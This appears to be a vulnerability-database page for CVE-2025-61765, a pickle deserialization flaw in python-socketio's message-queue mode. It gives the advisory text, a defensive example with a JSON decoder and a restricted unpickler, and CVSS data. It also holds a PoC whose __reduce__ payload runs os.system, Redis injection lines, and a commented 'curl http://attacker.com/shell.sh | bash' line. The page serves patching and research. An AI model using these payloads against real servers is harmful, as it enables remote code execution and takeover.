Security Vulnerability Report
CVE-2025-61765 CVSS 6.4 MEDIUM

CVE-2025-61765

Published: 2025-10-06 16:15:35
Last Modified: 2026-04-15 00:35:42

Description

python-socketio is a Python implementation of the Socket.IO realtime client and server. A remote code execution vulnerability in python-socketio versions prior to 5.14.0 allows attackers to execute arbitrary Python code through malicious pickle deserialization in multi-server deployments in which the attacker has previously gained access to the message queue that the servers use for internal communication.

When Socket.IO servers are configured to use a message queue backend such as Redis for inter-server communication, messages sent between the servers are encoded with Python's `pickle` module. When a server receives one of these messages through the message queue, it assumes the message is trusted and immediately deserializes it with `pickle.loads()`. Having previously obtained access to the message queue, an attacker can send a python-socketio server a crafted pickle payload that executes arbitrary code during deserialization via Python's `__reduce__` method.

This vulnerability only affects deployments with a compromised message queue. A successful attack lets the attacker execute arbitrary code in the context of, and with the privileges of, the Socket.IO server process. Single-server systems that do not use a message queue, and multi-server systems with a secure message queue, are not vulnerable.

In addition to following standard security practices in the deployment of the message queue, users of the python-socketio package can upgrade to version 5.14.0 or newer, which drops the use of the `pickle` module and switches to the much safer JSON encoding for inter-server messaging.
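The description above contrasts two consumer behaviours: trusting `pickle.loads()` on bytes pulled off a shared queue, and the JSON encoding adopted in 5.14.0. The following is an added example written for this page; it is not code from the CVE record, the advisory, or python-socketio itself. It places the unsafe decoder beside a JSON-only decoder with a shape check, and adds a restricted unpickler for a consumer that cannot drop pickle immediately. Function names, the `REQUIRED_FIELDS` layout and the sample messages are constructed for illustration and do not mirror python-socketio's actual wire format.

```python
"""
Added example, not part of the CVE record or of python-socketio's own code.
It contrasts the unsafe consumer pattern the advisory describes (handing
queue bytes straight to pickle.loads) with two defensive alternatives:
the JSON-only decoding the 5.14.0 fix adopts, and a restricted unpickler
for a consumer that cannot yet drop pickle. Function names, the message
layout and the sample messages are constructed for illustration.
"""
import datetime
import io
import json
import pickle

# ---- Unsafe pattern (what the advisory describes for versions < 5.14.0) ----

def decode_message_unsafe(raw: bytes):
    """Trusts whatever arrived on the shared queue. A payload whose
    __reduce__ names a callable runs it during this call."""
    return pickle.loads(raw)


# ---- Hardened pattern: JSON framing, as the fix adopts ----

REQUIRED_FIELDS = ("method", "event", "data", "namespace")  # constructed schema


def encode_message(msg: dict) -> bytes:
    """Serialise an inter-server message as UTF-8 JSON (no object hooks)."""
    return json.dumps(msg).encode("utf-8")


def looks_like_pickle(raw: bytes) -> bool:
    """Cheap early signal: protocol >= 2 pickles open with the PROTO opcode
    (0x80). Text-protocol pickles slip past this heuristic, but they still
    fail the JSON parse below; the flag only makes the rejection explicit
    for logging and alerting."""
    return raw[:1] == b"\x80"


def decode_message_safe(raw: bytes) -> dict:
    """Parse a queue message as JSON and validate its shape.
    Raises ValueError for anything else, so the caller can drop and log it."""
    if looks_like_pickle(raw):
        raise ValueError("pickle-framed message on inter-server queue")
    try:
        msg = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError(f"malformed queue message: {exc}") from exc
    if not isinstance(msg, dict) or any(k not in msg for k in REQUIRED_FIELDS):
        raise ValueError("queue message missing required fields")
    return msg


# ---- Mitigation for a consumer that cannot drop pickle yet ----

class RestrictedUnpickler(pickle.Unpickler):
    """Refuses to resolve any global name, following the pattern in the
    Python pickle documentation. A __reduce__-based payload has to name a
    callable through find_class, so it is rejected before anything runs;
    plain containers of str/int/float/bool/None still load."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def decode_message_restricted(raw: bytes):
    return RestrictedUnpickler(io.BytesIO(raw)).load()


# ---- Constructed samples and a helper for the checks ----

def sample_primitive_pickle() -> bytes:
    """A pickle containing only primitives: loads under the restricted unpickler."""
    return pickle.dumps({"method": "emit", "event": "ping", "data": [1, 2]})


def sample_global_pickle() -> bytes:
    """A harmless pickle that references a global (datetime.date), standing in
    for any payload that must resolve a callable or class by name."""
    return pickle.dumps(datetime.date(2025, 10, 6))


def rejects(decoder, raw: bytes) -> bool:
    """True when `decoder` refuses `raw` instead of returning a value."""
    try:
        decoder(raw)
    except (ValueError, pickle.UnpicklingError):
        return True
    return False


if __name__ == "__main__":
    good = encode_message({"method": "emit", "event": "ping", "data": [1], "namespace": "/"})
    print("JSON message accepted:", decode_message_safe(good))
    print("pickle bytes rejected by JSON decoder:",
          rejects(decode_message_safe, sample_primitive_pickle()))
    print("global-referencing pickle rejected by restricted unpickler:",
          rejects(decode_message_restricted, sample_global_pickle()))
    print("same pickle accepted by the unsafe decoder:",
          decode_message_unsafe(sample_global_pickle()))
```

The JSON decoder is the real fix: JSON has no object-reconstruction hook, so the worst a hostile queue message can do is fail to parse or carry unexpected fields, both of which surface as a `ValueError` the consumer can log as a signal that the queue is being tampered with. The restricted unpickler is only a stop-gap for a consumer that has to keep reading pickle from peers that have not yet upgraded; it blocks any payload that needs to resolve a global, which is how a `__reduce__` payload names its callable.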

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

python-socketio < 5.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61765 PoC - Malicious pickle payload for python-socketio RCE
# This payload demonstrates how an attacker with access to the message queue
# can craft a pickle payload to achieve RCE when deserialized by python-socketio server

import pickle
import os


class MaliciousPicklePayload:
    """
    Crafted pickle payload that exploits CVE-2025-61765.
    When python-socketio server calls pickle.loads() on this payload,
    arbitrary code will be executed via the __reduce__ method.
    """

    def __reduce__(self):
        # Command to execute on the target server
        # In real attack scenario, this could be reverse shell, data exfiltration, etc.
        command = "id > /tmp/pwned.txt"
        return (os.system, (command,))


def generate_malicious_payload(command="id > /tmp/pwned.txt"):
    """
    Generate a malicious pickle payload to be injected into the message queue
    (e.g., Redis) that python-socketio servers consume.
    """

    class Exploit:
        def __reduce__(self):
            return (os.system, (command,))

    payload = pickle.dumps(Exploit())
    return payload


def simulate_attack():
    """
    Simulate the attack scenario:
    1. Attacker gains access to Redis message queue
    2. Attacker injects malicious pickle payload into the queue
    3. python-socketio server consumes the message and deserializes it
    4. Arbitrary code execution occurs
    """
    # Step 1: Generate malicious payload
    malicious_payload = generate_malicious_payload("whoami > /tmp/rce_result.txt")
    print(f"[*] Generated malicious pickle payload ({len(malicious_payload)} bytes)")

    # Step 2: In a real scenario, inject into Redis:
    # import redis
    # r = redis.Redis(host='target-redis-host', port=6379)
    # r.lpush('socketio_queue', malicious_payload)
    print("[*] Payload would be injected into Redis queue")

    # Step 3: Demonstrate deserialization (what happens on server side)
    print("[*] Simulating server-side pickle.loads() call...")
    try:
        result = pickle.loads(malicious_payload)
        print(f"[!] Code executed! Result: {result}")
    except Exception as e:
        print(f"[*] Deserialization result: {e}")

    print("[*] Check /tmp/rce_result.txt for evidence of code execution")


if __name__ == "__main__":
    simulate_attack()

# Example: Injecting into Redis message queue used by python-socketio
# The python-socketio server uses Redis lists/pubsub for inter-server communication
# When it receives a message, it calls pickle.loads() on the data
#
# import redis
# r = redis.Redis(host='vulnerable-redis', port=6379, password='compromised_password')
# payload = generate_malicious_payload("curl http://attacker.com/shell.sh | bash")
# r.lpush('socketio', payload)  # or r.publish('socketio-channel', payload)

References

https://github.com/miguelgrinberg/python-socketio/commit/53f6be094257ed81476b0e212c8cddd6d06ca39a
https://github.com/miguelgrinberg/python-socketio/security/advisories/GHSA-g8c6-8fjj-2r4m
https://www.bluerock.io/post/cve-2025-61765-bluerock-discovers-critical-rce-in-socket-io-ecosystem

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61765",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-06T16:15:35.400",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "python-socketio is a Python implementation of the Socket.IO realtime client and server. A remote code execution vulnerability in python-socketio versions prior to 5.14.0 allows attackers to execute arbitrary Python code through malicious pickle deserialization in multi-server deployments on which the attacker previously gained access to the message queue that the servers use for internal communications. When Socket.IO servers are configured to use a message queue backend such as Redis for inter-server communication, messages sent between the servers are encoded using the `pickle` Python module. When a server receives one of these messages through the message queue, it assumes it is trusted and immediately deserializes it. The vulnerability stems from deserialization of messages using Python's `pickle.loads()` function. Having previously obtained access to the message queue, the attacker can send a python-socketio server a crafted pickle payload that executes arbitrary code during deserialization via Python's `__reduce__` method. This vulnerability only affects deployments with a compromised message queue. The attack can lead to the attacker executing random code in the context of, and with the privileges of a Socket.IO server process. Single-server systems that do not use a message queue, and multi-server systems with a secure message queue are not vulnerable. In addition to making sure standard security practices are followed in the deployment of the message queue, users of the python-socketio package can upgrade to version 5.14.0 or newer, which remove the `pickle` module and use the much safer JSON encoding for inter-server messaging."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 5.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-502"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/miguelgrinberg/python-socketio/commit/53f6be094257ed81476b0e212c8cddd6d06ca39a", "source": "[email protected]"},
      {"url": "https://github.com/miguelgrinberg/python-socketio/security/advisories/GHSA-g8c6-8fjj-2r4m", "source": "[email protected]"},
      {"url": "https://www.bluerock.io/post/cve-2025-61765-bluerock-discovers-critical-rce-in-socket-io-ecosystem", "source": "[email protected]"},
      {"url": "https://www.bluerock.io/post/cve-2025-61765-bluerock-discovers-critical-rce-in-socket-io-ecosystem", "source": "af854a3a-2127-422b-91ae-364da2661108"}
    ]
  }
}